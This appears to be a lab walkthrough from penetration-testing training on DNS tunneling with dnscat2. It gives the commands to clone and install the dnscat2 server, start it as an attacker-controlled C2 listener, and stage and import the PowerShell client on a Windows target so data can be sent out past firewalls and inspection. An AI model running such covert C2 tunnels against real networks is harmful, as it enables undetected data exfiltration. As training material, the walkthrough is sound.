> [Dnscat2](https://github.com/iagox86/dnscat2) is a tunneling tool that uses DNS protocol to send data between two hosts. It uses an encrypted `Command-&-Control` (`C&C` or `C2`) channel and sends data inside TXT records within the DNS protocol.

## DNS Data Exfiltration with dnscat2

- **Standard DNS Behavior:** In corporate AD environments, local DNS servers resolve host-names to IP addresses or forward requests to external servers for internet routing.
    
- **The dnscat2 Mechanic:** Instead of standard resolution, it requests addresses from a specific external server controlled by the attacker.
    
- **Data Tunneling:** Data is embedded within these DNS queries, allowing it to be ex-filtrated across the network disguised as legitimate lookup traffic.
    
- **Stealth Advantage:** It effectively bypasses firewalls and deep packet inspection (DPI) that typically focus on stripping or sniffing **HTTPS** connections.
    
- **Implementation:**
    
    - **Attack Host:** Runs the `dnscat2` server.
        
    - **Target (Windows) Host:** Executes the `dnscat2` client to establish the tunnel.

## Setting Up & Using dnscat2
```python
git clone https://github.com/iagox86/dnscat2.git 
cd dnscat2/server/ 
sudo gem install bundler 
sudo bundle install
```

#### Starting the dnscat2 server
```python
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
```

- After running the server, it will provide us the secret key, which we will have to provide to our dnscat2 client on the Windows host so that it can authenticate and encrypt the data that is sent to our external dnscat2 server.
- We can use the client with the dnscat2 project or use [dnscat2-powershell](https://github.com/lukebaggett/dnscat2-powershell), a dnscat2 compatible PowerShell-based client that we can run from Windows targets to establish a tunnel with our dnscat2 server.
- We can clone the project containing the client file to our attack host, then transfer it to the target.
#### Cloning dnscat2-powershell to the Attack Host
```python
git clone https://github.com/lukebaggett/dnscat2-powershell.git
```

Once the `dnscat2.ps1` file is on the target we can import it and run associated cmd-lets

#### Importing dnscat2.ps1

```python
PS C:\htb> Import-Module .\dnscat2.ps1
```

